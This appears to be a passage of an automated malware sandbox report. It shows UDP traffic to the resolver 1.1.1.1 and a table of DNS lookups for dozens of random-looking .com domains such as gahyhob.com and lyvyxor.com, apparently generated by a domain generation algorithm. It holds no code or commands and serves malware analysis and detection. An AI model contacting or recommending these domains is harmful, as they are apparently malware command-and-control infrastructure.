                                                                                                                                                                                                            Sep 8, 2024 09:00:34.353049040 CEST53530541.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.355045080 CEST6043153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.356031895 CEST53496831.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.358443022 CEST5035853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.361721992 CEST4986153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.361721992 CEST53546951.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.362463951 CEST5478253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.365430117 CEST5081253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.368081093 CEST5576153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.370935917 CEST53604311.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.371103048 CEST53498611.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.372829914 CEST6245153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.374803066 CEST53508121.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.377490044 CEST53557611.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.379308939 CEST6086553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.379612923 CEST5353553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.388015985 CEST5799353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.389820099 CEST6317053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.398865938 CEST53547821.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.398926973 CEST53535351.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.402306080 CEST53579931.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.402410984 CEST5702553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.403820038 CEST53631701.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.406954050 CEST5771753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.407145023 CEST5457153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.407919884 CEST6105753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.408319950 CEST6507253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.410487890 CEST53608651.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.415257931 CEST6516053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.415596008 CEST4993153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.415839911 CEST5864053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.416316032 CEST53577171.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.417398930 CEST5921153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.417681932 CEST53570251.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.417809963 CEST53545711.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.418217897 CEST5286453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.421283007 CEST5001653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.421617985 CEST5908753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.422935963 CEST5242853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.424194098 CEST53650721.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.424365044 CEST53499311.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.424696922 CEST53610571.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.424710989 CEST53651601.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.426670074 CEST53586401.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.426745892 CEST53592111.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.432466030 CEST53524281.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.436714888 CEST5390953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.436767101 CEST53500161.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.445797920 CEST5560453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.445995092 CEST5668553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.446227074 CEST6389653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.446485996 CEST5725953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.449887037 CEST5034553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.452013016 CEST53590871.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.452641964 CEST5397253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.455097914 CEST5540153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.455338001 CEST5440753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.455362082 CEST5676053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.455652952 CEST6393653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.455921888 CEST53572591.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.455960989 CEST6374553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.456393003 CEST53556041.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.456901073 CEST53638961.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.457082987 CEST53566851.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.457567930 CEST53539091.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.459557056 CEST5653853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.459867001 CEST53503451.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.460017920 CEST5070153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.460264921 CEST5128453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.461154938 CEST6090453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.464485884 CEST6357953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.464761019 CEST6424253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.464788914 CEST53639361.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.464854002 CEST5451053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.465017080 CEST5863053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.465145111 CEST5410353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.465265036 CEST53567601.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.465912104 CEST53637451.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.467928886 CEST53539721.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.468341112 CEST6245853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.468801975 CEST5327353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.468847036 CEST53565381.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.469007969 CEST6481053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.469538927 CEST53512841.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.470634937 CEST53609041.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.471436024 CEST53544071.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.473786116 CEST53635791.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.473923922 CEST53642421.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.474256039 CEST5339953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.474906921 CEST53586301.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.474916935 CEST53545101.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.475040913 CEST53541031.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.475158930 CEST6040153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.475909948 CEST53507011.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.476394892 CEST6235353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.476552963 CEST5631853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.478537083 CEST53624581.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.479899883 CEST53532731.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.484252930 CEST53533991.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.484702110 CEST53648101.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.486756086 CEST53563181.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.487004995 CEST5880053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.487041950 CEST5533853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.487288952 CEST4917553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.487389088 CEST6515353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.487524986 CEST5904553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.488358974 CEST6013153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.488470078 CEST5315553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.494328976 CEST53604011.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.500792027 CEST53491751.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.501403093 CEST53553381.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.501418114 CEST53601311.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.501692057 CEST53590451.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.506617069 CEST53588001.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.507334948 CEST53623531.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.508627892 CEST53531551.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.522183895 CEST53651531.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.529809952 CEST53503581.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.532610893 CEST6090753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.538800955 CEST53624511.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.546567917 CEST53609071.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.587255955 CEST53528641.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.611340046 CEST53554011.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.838671923 CEST5157753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.842170954 CEST5111553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.846231937 CEST5117353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.851015091 CEST6112753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.859304905 CEST53511151.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.859857082 CEST53511731.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.861797094 CEST53515771.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.862387896 CEST5466953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.866132975 CEST53611271.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.878861904 CEST53546691.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.883356094 CEST6277853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.884131908 CEST5884053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.894299030 CEST53627781.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.897550106 CEST53588401.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.900595903 CEST5532053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.904134035 CEST6238553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.917723894 CEST53553201.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.924139023 CEST53623851.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.930319071 CEST5944453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.930931091 CEST5839053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.933984995 CEST5645753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.934312105 CEST5137553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.934395075 CEST5923253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.934700966 CEST5677153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.936332941 CEST5816253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.937684059 CEST6512753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.940045118 CEST5196953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.941462994 CEST53594441.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.941981077 CEST6259153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.942336082 CEST6365253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.943952084 CEST4966553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.944808960 CEST53567711.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.944822073 CEST53592321.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.946002007 CEST6457953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.946278095 CEST53581621.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.946746111 CEST53583901.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.949166059 CEST53651271.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.949628115 CEST53519691.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.949856997 CEST53564571.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.951356888 CEST53625911.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.952090025 CEST53636521.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.956051111 CEST53645791.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.958868027 CEST5809453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.960280895 CEST53496651.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.960967064 CEST5544653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.961483955 CEST5019653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.961528063 CEST5252453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.961740017 CEST5036453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.963972092 CEST5050953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.965563059 CEST53513751.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.965818882 CEST5687553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.966006994 CEST5928853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.966203928 CEST5464953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.966407061 CEST6538753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.966619015 CEST5274853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.966708899 CEST6177753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.967119932 CEST5330153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.967308998 CEST5371253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.967487097 CEST5585153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.967730999 CEST6375653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.968014002 CEST5930953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.969034910 CEST53525241.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.970747948 CEST53580941.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.971060038 CEST53554461.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.971616030 CEST53503641.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.975194931 CEST53592881.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.975478888 CEST53568751.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.976526022 CEST53617771.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.977266073 CEST53527481.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.977782965 CEST53637561.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.979087114 CEST53593091.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.983071089 CEST53537121.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.994971037 CEST53505091.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.996356010 CEST53546491.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.997294903 CEST53533011.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.997968912 CEST53653871.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:35.121479988 CEST53501961.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:35.128478050 CEST53558511.1.1.1192.168.2.4

                                                                                                                                                                                                            DNS Queries

                                                                                                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.005814075 CEST192.168.2.41.1.1.10x5778Standard query (0)gahyhob.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.006629944 CEST192.168.2.41.1.1.10xd312Standard query (0)lyvyxor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.009535074 CEST192.168.2.41.1.1.10x3641Standard query (0)vocyruk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.011212111 CEST192.168.2.41.1.1.10xe547Standard query (0)qegyhig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.016293049 CEST192.168.2.41.1.1.10xbb8fStandard query (0)purycap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.016896009 CEST192.168.2.41.1.1.10x7e00Standard query (0)gacyryw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.039918900 CEST192.168.2.41.1.1.10x43Standard query (0)lygygin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.041723967 CEST192.168.2.41.1.1.10x4a0dStandard query (0)gatyfus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.042109013 CEST192.168.2.41.1.1.10xf0fStandard query (0)vowycac.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.071846962 CEST192.168.2.41.1.1.10x12f4Standard query (0)qetyfuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.074656963 CEST192.168.2.41.1.1.10xf671Standard query (0)vojyqem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.077595949 CEST192.168.2.41.1.1.10x4d5fStandard query (0)puvyxil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.080384016 CEST192.168.2.41.1.1.10x931cStandard query (0)gahyqah.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.083302975 CEST192.168.2.41.1.1.10xaabaStandard query (0)lyryfyd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.100544930 CEST192.168.2.41.1.1.10x6faStandard query (0)lysynur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.102533102 CEST192.168.2.41.1.1.10x5867Standard query (0)qeqysag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.102777958 CEST192.168.2.41.1.1.10xdf2dStandard query (0)qexylup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.103293896 CEST192.168.2.41.1.1.10xb231Standard query (0)vonypom.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.295887947 CEST192.168.2.41.1.1.10xee15Standard query (0)gadyfuh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.298326969 CEST192.168.2.41.1.1.10x7fddStandard query (0)qexyryl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.299993038 CEST192.168.2.41.1.1.10x3dfdStandard query (0)galykes.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.300417900 CEST192.168.2.41.1.1.10x7646Standard query (0)volykyc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.303713083 CEST192.168.2.41.1.1.10x87cfStandard query (0)qedynul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.304233074 CEST192.168.2.41.1.1.10xa4dcStandard query (0)pumypog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.306637049 CEST192.168.2.41.1.1.10x98c9Standard query (0)gadyniw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.309925079 CEST192.168.2.41.1.1.10x6410Standard query (0)lymysan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.310264111 CEST192.168.2.41.1.1.10xe2baStandard query (0)lyxylux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.310698032 CEST192.168.2.41.1.1.10x193eStandard query (0)pufymoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.313899994 CEST192.168.2.41.1.1.10xa0c5Standard query (0)vofymik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.314336061 CEST192.168.2.41.1.1.10x9a08Standard query (0)gaqydeb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.315342903 CEST192.168.2.41.1.1.10x9f20Standard query (0)puvytuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.315779924 CEST192.168.2.41.1.1.10x42e9Standard query (0)qetyvep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.316831112 CEST192.168.2.41.1.1.10xf1f1Standard query (0)gatyvyz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.317259073 CEST192.168.2.41.1.1.10x6efbStandard query (0)pujyjav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.319271088 CEST192.168.2.41.1.1.10xccc6Standard query (0)qebytiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.319617033 CEST192.168.2.41.1.1.10xb2e5Standard query (0)vopybyt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.321590900 CEST192.168.2.41.1.1.10x80f0Standard query (0)lykyjad.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.323005915 CEST192.168.2.41.1.1.10x743Standard query (0)lyvytuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.323353052 CEST192.168.2.41.1.1.10xc394Standard query (0)pupybul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.326039076 CEST192.168.2.41.1.1.10x8b28Standard query (0)lyryvex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.334219933 CEST192.168.2.41.1.1.10x81fStandard query (0)qekykev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.334700108 CEST192.168.2.41.1.1.10x4a59Standard query (0)vojyjof.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.341459036 CEST192.168.2.41.1.1.10xc95dStandard query (0)puzylyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.378185034 CEST192.168.2.41.1.1.10x8db5Standard query (0)gaqycos.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.379475117 CEST192.168.2.41.1.1.10xc702Standard query (0)ganypih.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.389413118 CEST192.168.2.41.1.1.10x9dc6Standard query (0)qeqyxov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.444623947 CEST192.168.2.41.1.1.10xaf49Standard query (0)galyqaz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.445197105 CEST192.168.2.41.1.1.10x41cStandard query (0)vonyzuf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.445377111 CEST192.168.2.41.1.1.10xcc8aStandard query (0)pumyxiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.445550919 CEST192.168.2.41.1.1.10x19a0Standard query (0)lysyfyj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.445734024 CEST192.168.2.41.1.1.10xc5aStandard query (0)lymyxid.comA (IP address)IN (0x0001)false
